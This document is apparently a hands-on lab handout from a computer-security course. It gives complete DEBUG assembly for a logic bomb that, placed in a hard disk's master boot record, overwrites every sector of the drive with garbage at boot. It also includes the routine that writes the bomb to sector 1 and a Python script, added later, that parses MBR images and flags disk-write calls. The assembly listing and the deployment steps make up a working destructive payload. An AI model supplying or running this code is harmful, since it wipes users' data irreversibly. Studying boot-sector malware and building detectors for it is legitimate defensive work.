Materials:
Working complete PC
Blank Diskette
Student Diskette, "New Boot A Ver 2.0+"
Student CD-ROM, "Room 6359"

Objectives: The student will become familiar with MBR-installed logic bombs, including: designing an effective logic bomb, building the logic bomb, saving the logic bomb to a file, and deploying the logic bomb in the MBR.

Competency: The student will learn how to design an effective logic bomb that will destroy all data on the HDD, then use DEBUG to create the logic bomb, save it to a file and deploy it to the MBR sector from the file. The student will then boot the PC, allow the logic bomb to do its damage, and then reboot to the student CD-ROM and check whether it worked.
Preparation
Since the planned logic bomb will do large-scale devastation to the target HDD, a Ghost restore image will be placed on a lab PC for the purposes of development and testing of the logic bomb. It is highly destructive and should never be tested on a PC of any value.
Procedures
After preparing a "guinea pig" PC, run DEBUG and save the MBR to a file on a bootable floppy diskette so that it can be restored at will, along with a Ghost restoration of the entire HDD if and when necessary during the course of this operation.
The MBR will then be modified into a logic bomb and saved again as a file with a different name. Later, batch files will be developed for deploying the logic bomb. The purpose of the logic bomb is to destroy the contents of the HDD if the PC is booted by anyone who does not know about the existence of the bomb and how to keep it from destroying the HDD. The logic bomb works by placing the destructive code within the MBR, which executes automatically when the PC boots. Instead of doing what an MBR is supposed to do, which is to find and launch the DBR of the active partition, the changed MBR code proceeds to overwrite the HDD sector by sector with nonsense.
The logic bomb code must do the following (each instruction is followed by what it does):

MOV AX, F000 / MOV ES, AX  These two lines set ES to F000, the segment of the BIOS ROM code, which is the data source to be written to the HDD sectors
XOR BX, BX  A legal instruction that rapidly sets BX = 0, so the source buffer is ES:BX = F000:0000
MOV DL, 80  INT 13h parameter: work on physical drive 80h (the first HDD)
MOV CL, 1  INT 13h parameter: target sector is Sector #1
MOV CH, 0  INT 13h parameter: target sector is in Cyl #0
MOV DH, 0  INT 13h parameter: target sector is in Head #0
MOV AX, 0340  INT 13h parameters: AH = 03 = Write, AL = 40 = 64 sectors (32KB per call)
INT 13  Call BIOS INT 13h disk services
INC DH  Advance to the next head number (INC = INCrement by one)
CMP DH, FF  Check that it has not reached 255, which does not exist (NOTE: the HDD has 255 heads, numbered 0 - 254)
JE (current offset + 4)  Once this value is reached, the cylinder number must be incremented and the head number reset to 0; the jump occurs only if the preceding compare found DH = FF (JE and the JMP that follows it are both 2-byte short jumps, hence + 4)
JMP (offset of the MOV AX, 0340 instruction)  Otherwise repeat the call to write 64 sectors, the register value having been changed to point to the next head
INC CH  Advance to the next cylinder number (the low 8 bits of it)
CMP CH, 0  Cylinder 255 DOES exist, so check whether CH has wrapped back around to 0
JE (offset + 4)  If it has wrapped around to 0, jump to change the sector number (NOTE: the top 2 bits of the sector number held in CL are the top 2 bits of the 10-bit cylinder number)
JMP (offset of the MOV DH, 0 instruction)  Otherwise continue the loop, resetting the head number to 0
ADD CL, 40  Adds one to the top 2 bits of CL, that is, to bits 8-9 of the 10-bit cylinder number
JC (offset + 4)  On the fourth pass C1 + 40 = 101; the leading 1 does not fit in the 8-bit register, so the result is truncated to 01 but the addition sets the carry flag. A carry means all 1024 cylinders (0 - 3FF) have been written, so jump to the hang
JMP (offset of the MOV CH, 0 instruction)  Reset the low 8 bits of the cylinder number to 0 and the head number to 0, then call BIOS to write 64 sectors, continuing the loop
NOP  Prepares to hang the machine, executing the instruction that does nothing
JMP (offset of the NOP instruction)  Loops forever on the NOP instruction

Note that the code never tests the carry flag that INT 13h returns on error. A failed or clipped write (64 sectors starting at sector 1 spans more than one 63-sector track, which not every BIOS will service as a single multi-track transfer) is silently ignored and the loop simply moves on to the next head.
Now all that remains is to enter this code into "BUG.MBR" and save it again. With BUG.MBR loaded in DEBUG, start the DEBUG assembler with "a 100" and type in the above code; when a jump instruction needs an offset, calculate it or read it from the listing as the case requires and enter it. The segment value (0AFE below) will differ from machine to machine; only the offsets matter:

-a 100
0AFE:0100 mov ax, f000
0AFE:0103 mov es, ax
0AFE:0105 xor bx, bx
0AFE:0107 mov dl, 80
0AFE:0109 mov cl, 1
0AFE:010B mov ch, 0
0AFE:010D mov dh, 0
0AFE:010F mov ax, 340
0AFE:0112 int 13
0AFE:0114 inc dh
0AFE:0116 cmp dh, ff
0AFE:0119 je 11d        <- 119 + 4 = 11D hex
0AFE:011B jmp 10f       <- address of mov ax, 340
0AFE:011D inc ch
0AFE:011F cmp ch, 0
0AFE:0122 je 126        <- 122 + 4 = 126
0AFE:0124 jmp 10d       <- address of mov dh, 0
0AFE:0126 add cl, 40
0AFE:0129 jc 12d        <- 129 + 4 = 12D hex
0AFE:012B jmp 10b       <- address of mov ch, 0
0AFE:012D nop
0AFE:012E jmp 12d       <- address of nop
0AFE:0130               <- press [Enter] on the empty line to leave the assembler
-
Execute the W command again to save the changes (CX must still hold the file length of 200h bytes so that the whole 512-byte sector is written). Now create and execute, within DEBUG, the code that writes the new MBR from the buffer at offset 100 to the first physical sector of the HDD; INT 3 at the end returns control to the DEBUG prompt:

-a 300
0AFE:0300 mov ax, 301   <- AH = 03 write, AL = 01 sector
0AFE:0303 mov bx, 100   <- buffer: the new MBR at DS:0100
0AFE:0306 mov cx, 1     <- cylinder 0, sector 1
0AFE:0309 mov dx, 80    <- head 0, physical drive 80h
0AFE:030C int 13
0AFE:030E int 3         <- back to the DEBUG prompt
0AFE:030F
-g=300
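Before writing a 512-byte file to sector 1 with the routine above, or restoring the saved original MBR later, it pays to inspect the file rather than trust its name. The script below is an added example and not part of the original lab: it parses an MBR image (boot code, the four partition entries at 1BEh with their packed CHS fields, and the 55 AA signature), diffs it against the known-good backup, and flags boot code that calls INT 13h with AH = 03, a BIOS write, which a normal MBR never issues. The two sample sectors, the boot stubs and the partition entry are constructed inline for illustration and are not images of a real drive; the write-call scan is a byte-pattern heuristic, not a disassembler.

```python
"""Check a 512-byte MBR image against a known-good backup (added example)."""
import struct

SECTOR_SIZE = 512
PART_TABLE_OFFSET = 0x1BE   # four 16-byte partition entries
SIGNATURE_OFFSET = 0x1FE    # 55 AA
BOOT_SIGNATURE = b"\x55\xAA"


def decode_chs(raw):
    """Unpack a 3-byte CHS field: head, sector (6 bits) + cyl bits 8-9, cyl low 8 bits."""
    head = raw[0]
    sector = raw[1] & 0x3F
    cylinder = ((raw[1] & 0xC0) << 2) | raw[2]
    return cylinder, head, sector


def parse_mbr(sector):
    """Split an MBR into boot code, used partition entries and signature status."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("MBR image must be exactly 512 bytes")
    partitions = []
    for i in range(4):
        off = PART_TABLE_OFFSET + 16 * i
        status, chs_start, ptype, chs_end, lba_start, count = struct.unpack(
            "<B3sB3sII", sector[off:off + 16])
        if ptype == 0:
            continue  # empty slot
        partitions.append({
            "bootable": status == 0x80,
            "type": ptype,
            "chs_start": decode_chs(chs_start),
            "chs_end": decode_chs(chs_end),
            "lba_start": lba_start,
            "sectors": count,
        })
    return {
        "bootcode": sector[:PART_TABLE_OFFSET],
        "partitions": partitions,
        "signature_ok": sector[SIGNATURE_OFFSET:] == BOOT_SIGNATURE,
    }


def find_disk_writes(code, lookback=8):
    """Offsets of INT 13h (CD 13) preceded within `lookback` bytes by
    MOV AH,03 (B4 03) or MOV AX,03xx (B8 xx 03), i.e. a BIOS write.
    Heuristic only: an immediate operand can be mistaken for an opcode."""
    hits = []
    for i in range(len(code) - 1):
        if code[i:i + 2] != b"\xCD\x13":
            continue
        window = code[max(0, i - lookback):i]
        mov_ah = b"\xB4\x03" in window
        mov_ax = any(window[j] == 0xB8 and window[j + 2] == 0x03
                     for j in range(len(window) - 2))
        if mov_ah or mov_ax:
            hits.append(i)
    return hits


def compare_mbr(good, suspect):
    """Report what changed between the backup and the sector about to be written."""
    g, s = parse_mbr(good), parse_mbr(suspect)
    return {
        "bootcode_changed": g["bootcode"] != s["bootcode"],
        "partition_table_changed":
            good[PART_TABLE_OFFSET:SIGNATURE_OFFSET] != suspect[PART_TABLE_OFFSET:SIGNATURE_OFFSET],
        "signature_ok": s["signature_ok"],
        "write_calls": find_disk_writes(s["bootcode"]),
    }


def build_sector(bootcode, partition_entry):
    """Assemble a constructed 512-byte MBR from a boot stub and one partition entry."""
    body = bootcode.ljust(PART_TABLE_OFFSET, b"\x00")
    table = partition_entry.ljust(64, b"\x00")
    return body + table + BOOT_SIGNATURE


# Constructed stand-in for a normal MBR stub:
# cli / xor ax,ax / mov ss,ax / mov sp,7C00 / mov ax,0201 (read 1 sector) / int 13h
GOOD_STUB = bytes.fromhex("FA 33 C0 8E D0 BC 00 7C B8 01 02 CD 13")
# Same stub with the read turned into a write: mov ax,0340 (write 64 sectors)
BAD_STUB = bytes.fromhex("FA 33 C0 8E D0 BC 00 7C B8 40 03 CD 13")
# Constructed entry: active, FAT32 (0B), CHS 0/1/1 to 1023/254/63, LBA 63, 0x1F0000 sectors
PART = bytes.fromhex("80 01 01 00 0B FE FF FF 3F 00 00 00 00 00 1F 00")

GOOD_MBR = build_sector(GOOD_STUB, PART)
BAD_MBR = build_sector(BAD_STUB, PART)

if __name__ == "__main__":
    for key, value in compare_mbr(GOOD_MBR, BAD_MBR).items():
        print(f"{key}: {value}")
    print("partitions:", parse_mbr(BAD_MBR)["partitions"])
```

Run against real files with `compare_mbr(open("GOOD.MBR", "rb").read(), open("BUG.MBR", "rb").read())`: a restore image should show nothing changed and no write calls, while the bomb shows the boot code changed, the partition table and signature intact, and a write call in the first few bytes.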
The logic bomb is now in place. Reboot the machine to the HDD. At the point after the POST screens, with the cursor at the bottom of the screen where the OS startup should begin, the system will appear to hang: no boot message ever appears. Observe the HDD activity light. It should stay lit, indicating constant activity as the loop proceeds to overwrite the entire drive with the 32KB block of BIOS code at F000:0000h.
Interrupt the logic bomb after about 20 seconds (roughly the time the average user would wait at this point before realizing that something is wrong) by pressing [Ctrl]+[Alt]+[Delete]. Insert New Boot A or its equivalent and start Norton Utilities DiskEdit. Change to Physical Disks > Physical Hard Disk 1, then page down through the disaster.
In the next exercise, an easy deployment method using a bootable floppy diskette equipped with batch files that can load either the good MBR or the bad one will be developed.
Copyright©2000-2006 Brian Robinson ALL RIGHTS RESERVED